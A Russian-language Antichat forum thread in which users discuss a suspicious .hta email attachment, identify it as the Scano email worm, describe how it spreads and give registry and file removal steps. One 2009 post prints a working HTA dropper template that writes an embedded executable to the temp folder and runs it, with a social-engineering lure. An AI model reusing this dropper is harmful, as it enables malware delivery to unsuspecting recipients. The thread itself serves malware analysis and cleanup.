ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Странныое сообщение (_________.hta )
  #1  
Старый 11.07.2006, 21:48
TERYS
Участник форума
Регистрация: 11.01.2006
Сообщений: 128
Провел на форуме:
612424

Репутация: 55
По умолчанию Странныое сообщение (_________.hta )

Сегодня на 2 моих ящика пришло 2 примерно одинаковых сообщения, типа привет как дела ... вот заплатка или прога от нового вируса, но факт в том, что эти сообщения пришли с разных ящиков и с одним и тем же файликом

Имя файла: _________.hta
Размер файла: 60КБ

имя файла одинаковвые как на одном так и на другом мыле.
Что это может значить, и не приходило ли вам такое сообщение?

Вот залил эту прогу, толи заплатку сюда: http://slil.ru/22915583

Жду ответов...
 
Ответить с цитированием

  #2  
Старый 11.07.2006, 22:14
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310

Репутация: 488
По умолчанию

скачал, открыл - vbs скрипт, и дира " C: " .. ... .. лог. бомба? =)
 
Ответить с цитированием

  #3  
Старый 12.07.2006, 02:41
Eco[L]og
Новичок
Регистрация: 02.07.2006
Сообщений: 24
Провел на форуме:
65670

Репутация: 14
По умолчанию

это Email-Worm.Win32.Scano.e.
Расширение .hta это СИ
 
Ответить с цитированием

  #4  
Старый 12.07.2006, 03:54
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

...троян это скорее всего.... у меня даже конвектор был exe2hta.....
__________________
 
Ответить с цитированием

  #5  
Старый 12.07.2006, 11:58
Eco[L]og
Новичок
Регистрация: 02.07.2006
Сообщений: 24
Провел на форуме:
65670

Репутация: 14
По умолчанию

нет это не троян. я же написал что это червь....
он сканит машину на адреса почты. Ищит адреса в следующих файлах:
adb asp cfg cgi dbx dhtm dhtml eml htm html jsp mbx mdx mht mmf mra msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml и рассылает себя по найденым адресам. Причем рассылает себя используя примое подключение к SMTP серваку.
Цитата:
Червь соединяется со следующими удаленными серверами для загрузки других файлов:
http://207.**.250.119
http://84.**.161.192
http://85.249.**.35
Для удаления, если уже подхватили:
Удалить из реестра вот эти записи.
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="%Windir%\csrss.exe"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Application"="%Windir\csrss.exe"

и вот эти файлы
%Windir%\csrss.exe
C:\ntldr.exe

Последний раз редактировалось Eco[L]og; 12.07.2006 в 12:04..
 
Ответить с цитированием

  #6  
Старый 06.02.2009, 18:20
or1
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме:
127764

Репутация: -1
По умолчанию

затрояненный HTA-файл может выглядеть примерно так.

<font color="#008000"><HTML>
<HEAD><hta:application />

<SCRIPT language="JavaScript">

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян

var fso = new ActiveXObject("Scripting.FileSystemObject");

var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла

var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();

var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его

</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
---------------------------------------------------------------------------------------------------
вопрос что за этот код и как и с чем его едят

code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
 
Ответить с цитированием

  #7  
Старый 06.02.2009, 22:34
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме:
2954516

Репутация: 303


По умолчанию

or1, нах поднял тему 2-х летней давности?
 
Ответить с цитированием

  #8  
Старый 06.02.2009, 22:35
awdrg
Участник форума
Регистрация: 30.01.2009
Сообщений: 196
Провел на форуме:
505362

Репутация: 66
Отправить сообщение для awdrg с помощью ICQ
По умолчанию

некропостер!11один
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Очень красиво опустили СекЛабовцев =) SladerNon Мировые новости 28 16.07.2008 06:19
что за сообщение безопастности? donetsk Windows 2 04.05.2006 23:22
Послать сообщение [Artem] Уязвимости 10 02.04.2006 11:37
СМС ВИРУСЫ: silveran Сотовый фрикинг 23 10.02.2006 19:30
Вирус в сообщение Icq XgLuiR ICQ 28 12.11.2005 14:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ